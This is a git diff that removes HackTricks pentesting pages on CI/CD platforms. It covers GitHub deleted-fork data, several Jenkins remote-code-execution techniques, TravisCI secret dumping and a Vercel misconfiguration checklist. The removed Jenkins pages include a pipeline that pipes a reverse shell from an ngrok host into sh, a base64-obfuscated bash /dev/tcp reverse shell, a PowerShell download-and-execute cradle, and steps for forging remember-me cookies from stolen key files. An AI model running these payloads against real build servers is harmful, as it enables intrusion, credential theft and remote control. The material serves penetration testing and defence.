-{% endhint %} - -This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github). - -## Accessing Deleted Fork Data - -1. You fork a public repository -2. You commit code to your fork -3. You delete your fork - -{% hint style="danger" %} -The data commited in the deleted fork is still accessible. -{% endhint %} - -## Accessing Deleted Repo Data - -1. You have a public repo on GitHub. -2. A user forks your repo. -3. You commit data after they fork it (and they never sync their fork with your updates). -4. You delete the entire repo. - -{% hint style="danger" %} -Even if you deleted your repo, all the changes made to it are still accessible through the forks. -{% endhint %} - -## Accessing Private Repo Data - -1. You create a private repo that will eventually be made public. -2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public. -3. You make your “upstream” repository public and keep your fork private. - -{% hint style="danger" %} -It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public. -{% endhint %} - -## How to discover commits from deleted/hidden forks - -The same blog post propose 2 options: - -### Directly accessing the commit - -If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/` - -### Brute-forcing short SHA-1 values - -It's the same to access both of these: - -* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14) -* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463) - -And the latest one use a short sha-1 that is bruteforceable. - -## References - -* [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md deleted file mode 100644 index 06ae83621..000000000 --- a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md +++ /dev/null @@ -1,135 +0,0 @@ -# Jenkins Arbitrary File Read to RCE via "Remember Me" - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) - -This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own: - -### Attack Prerequisites - -* **Feature Requirement:** "Remember me" must be enabled (default setting). -* **Access Levels:** Attacker needs Overall/Read permissions. -* **Secret Access:** Ability to read both binary and textual content from key files. - -### Detailed Exploitation Process - -#### Step 1: Data Collection - -**User Information Retrieval** - -* Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather: - * **Username** - * **User seed** - * **Timestamp** - * **Password hash** - -**Secret Key Extraction** - -* Extract cryptographic keys used for signing the cookie: - * **Secret Key:** `$JENKINS_HOME/secret.key` - * **Master Key:** `$JENKINS_HOME/secrets/master.key` - * **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` - -#### Step 2: Cookie Forging - -**Token Preparation** - -* **Calculate Token Expiry Time:** - - {% code overflow="wrap" %} - ```javascript - tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time - ``` - {% endcode %} -* **Concatenate Data for Token:** - - {% code overflow="wrap" %} - ```javascript - token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey - ``` - {% endcode %} - -**MAC Key Decryption** - -* **Decrypt MAC Key File:** - - ```javascript - key = toAes128Key(masterKey) // Convert master key to AES128 key format - decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file - if not decrypted.hasSuffix("::::MAGIC::::") - return ERROR; - macKey = decrypted.withoutSuffix("::::MAGIC::::") - ``` - -**Signature Computation** - -* **Compute HMAC SHA256:** - - ```javascript - mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key - tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string - ``` - -**Cookie Encoding** - -* **Generate Final Cookie:** - - {% code overflow="wrap" %} - ```javascript - cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature) // Base64 encode the cookie data - ``` - {% endcode %} - -#### Step 3: Code Execution - -**Session Authentication** - -* **Fetch CSRF and Session Tokens:** - * Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`. - * Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie. - -**Command Execution Request** - -* **Send a POST Request with Groovy Script:** - - ```bash - curl -X POST "$JENKINS_URL/scriptText" \ - --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ - --header "Jenkins-Crumb: $CRUMB" \ - --header "Content-Type: application/x-www-form-urlencoded" \ - --data-urlencode "script=$SCRIPT" - ``` - - * Groovy script can be used to execute system-level commands or other operations within the Jenkins environment. - -The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md deleted file mode 100644 index 34044c311..000000000 --- a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md +++ /dev/null @@ -1,65 +0,0 @@ -# Jenkins RCE Creating/Modifying Pipeline - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Creating a new Pipeline - -In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:** - -![](<../../.gitbook/assets/image (235).png>) - -In the **Pipeline section** write the **reverse shell**: - -![](<../../.gitbook/assets/image (285).png>) - -```groovy -pipeline { - agent any - - stages { - stage('Hello') { - steps { - sh ''' - curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh - ''' - } - } - } -} -``` - -Finally click on **Save**, and **Build Now** and the pipeline will be executed: - -![](<../../.gitbook/assets/image (228).png>) - -## Modifying a Pipeline - -If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md deleted file mode 100644 index b11c7dcb3..000000000 --- a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md +++ /dev/null @@ -1,62 +0,0 @@ -# Jenkins RCE Creating/Modifying Project - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Creating a Project - -This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). - -1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob` -2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ -3. Click **Build now** - 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *` - 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`** - -![](<../../.gitbook/assets/image (165).png>) - -## Modifying a Project - -Go to the projects and check **if you can configure any** of them (look for the "Configure button"): - -![](<../../.gitbook/assets/image (265).png>) - -If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others). - -Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`). - -## Execution - -If you are allowed to configure the project you can **make it execute commands when a build is successful**: - -![](<../../.gitbook/assets/image (98).png>) - -Click on **Save** and **build** the project and your **command will be executed**.\ -If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md deleted file mode 100644 index 786f87325..000000000 --- a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md +++ /dev/null @@ -1,89 +0,0 @@ -# Jenkins RCE with Groovy Script - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Jenkins RCE with Groovy Script - -This is less noisy than creating a new project in Jenkins - -1. Go to _path\_jenkins/script_ -2. Inside the text box introduce the script - -```python -def process = "PowerShell.exe ".execute() -println "Found text ${process.text}" -``` - -You could execute a command using: `cmd.exe /c dir` - -In **linux** you can do: **`"ls /".execute().text`** - -If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload. - -**Another useful groovy script** is (replace \[INSERT COMMAND]): - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = '[INSERT COMMAND]'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in linux - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in windows - -You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: - -```python -scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" -echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 -cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc -``` - -### Script - -You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py). - -You can use MSF to get a reverse shell: - -``` -msf> use exploit/multi/http/jenkins_script_console -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/todo.md b/pentesting-ci-cd/todo.md deleted file mode 100644 index 716bbecf1..000000000 --- a/pentesting-ci-cd/todo.md +++ /dev/null @@ -1,42 +0,0 @@ -# TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective - -* Drone -* TeamCity -* BuildKite -* OctopusDeploy -* Rancher -* Mesosphere -* Radicle -* Any other CI/CD platform... - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md deleted file mode 100644 index 9d14e9703..000000000 --- a/pentesting-ci-cd/travisci-security/README.md +++ /dev/null @@ -1,92 +0,0 @@ -# TravisCI Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## What is TravisCI - -**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**. - -{% content-ref url="basic-travisci-information.md" %} -[basic-travisci-information.md](basic-travisci-information.md) -{% endcontent-ref %} - -## Attacks - -### Triggers - -To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**: - -![](<../../.gitbook/assets/image (145).png>) - -#### Cron Jobs - -If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build: - -![](<../../.gitbook/assets/image (243).png>) - -{% hint style="info" %} -It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162). -{% endhint %} - -### Third Party PR - -TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: - -![](<../../.gitbook/assets/image (208).png>) - -### Dumping Secrets - -As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines). - -* To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build. -* To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**. -* To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as: - -![](<../../.gitbook/assets/image (81).png>) - -### TODO: - -* Example build with reverse shell running on Windows/Mac/Linux -* Example build leaking the env base64 encoded in the logs - -### TravisCI Enterprise - -If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to: - -* escape to the host? -* compromise kubernetes? -* compromise other machines running in the same network? -* compromise new cloud credentials? - -## References - -* [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/) -* [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/vercel-security.md b/pentesting-ci-cd/vercel-security.md deleted file mode 100644 index f46ad4fb1..000000000 --- a/pentesting-ci-cd/vercel-security.md +++ /dev/null @@ -1,463 +0,0 @@ -# Vercel - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**. - -For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also). - -## Project Settings - -### General - -**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations. - -#### Security Configurations: - -* **Transfer** - * **Misconfiguration:** Allows to transfer the project to another team - * **Risk:** An attacker could steal the project -* **Delete Project** - * **Misconfiguration:** Allows to delete the project - * **Risk:** Delete the prject - -*** - -### Domains - -**Purpose:** Manage custom domains, DNS settings, and SSL configurations. - -#### Security Configurations: - -* **DNS Configuration Errors** - * **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers. - * **Risk:** Domain hijacking, traffic interception, and phishing attacks. -* **SSL/TLS Certificate Management** - * **Misconfiguration:** Using weak or expired SSL/TLS certificates. - * **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality. -* **DNSSEC Implementation** - * **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings. - * **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks. -* **Environment used per domain** - * **Misconfiguration:** Change the environment used by the domain in production. - * **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production. - -*** - -### Environments - -**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables. - -#### Security Configurations: - -* **Environment Isolation** - * **Misconfiguration:** Sharing environment variables across environments. - * **Risk:** Leakage of production secrets into development or preview environments, increasing exposure. -* **Access to Sensitive Environments** - * **Misconfiguration:** Allowing broad access to production environments. - * **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches. - -*** - -### Environment Variables - -**Purpose:** Manage environment-specific variables and secrets used by the application. - -#### Security Configurations: - -* **Exposing Sensitive Variables** - * **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - * **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -* **Sensitive disabled** - * **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. -* **Shared Environment Variables** - * **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. - -*** - -### Git - -**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers. - -#### Security Configurations: - -* **Ignored Build Step (TODO)** - * **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE. - * **Risk:** TBD - -*** - -### Integrations - -**Purpose:** Connect third-party services and tools to enhance project functionalities. - -#### Security Configurations: - -* **Insecure Third-Party Integrations** - * **Misconfiguration:** Integrating with untrusted or insecure third-party services. - * **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations. -* **Over-Permissioned Integrations** - * **Misconfiguration:** Granting excessive permissions to integrated services. - * **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions. -* **Lack of Integration Monitoring** - * **Misconfiguration:** Failing to monitor and audit third-party integrations. - * **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches. - -*** - -### Deployment Protection - -**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments. - -#### Security Configurations: - -**Vercel Authentication** - -* **Misconfiguration:** Disabling authentication or not enforcing team member checks. -* **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse. - -**Protection Bypass for Automation** - -* **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets. -* **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments. - -**Shareable Links** - -* **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links. -* **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions. - -**OPTIONS Allowlist** - -* **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints. -* **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks. - -**Password Protection** - -* **Misconfiguration:** Using weak passwords or sharing them insecurely. -* **Risk:** Unauthorized access to deployments if passwords are guessed or leaked. -* **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. - -**Deployment Protection Exceptions** - -* **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently. -* **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access. -* **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. - -**Trusted IPs** - -* **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges. -* **Risk:** Legitimate users being blocked or unauthorized IPs gaining access. -* **Note:** Available on the **Enterprise** plan. - -*** - -### Functions - -**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies. - -#### Security Configurations: - -* **Nothing** - -*** - -### Data Cache - -**Purpose:** Manage caching strategies and settings to optimize performance and control data storage. - -#### Security Configurations: - -* **Purge Cache** - * **Misconfiguration:** It allows to delete all the cache. - * **Risk:** Unauthorized users deleting the cache leading to a potential DoS. - -*** - -### Cron Jobs - -**Purpose:** Schedule automated tasks and scripts to run at specified intervals. - -#### Security Configurations: - -* **Disable Cron Job** - * **Misconfiguration:** It allows to disable cron jobs declared inside the code - * **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for) - -*** - -### Log Drains - -**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing. - -#### Security Configurations: - -* Nothing (managed from teams settings) - -*** - -### Security - -**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more. - -#### Security Configurations: - -**Build Logs and Source Protection** - -* **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly. -* **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities. - -**Git Fork Protection** - -* **Misconfiguration:** Allowing unauthorized pull requests without proper reviews. -* **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors. - -**Secure Backend Access with OIDC Federation** - -* **Misconfiguration:** 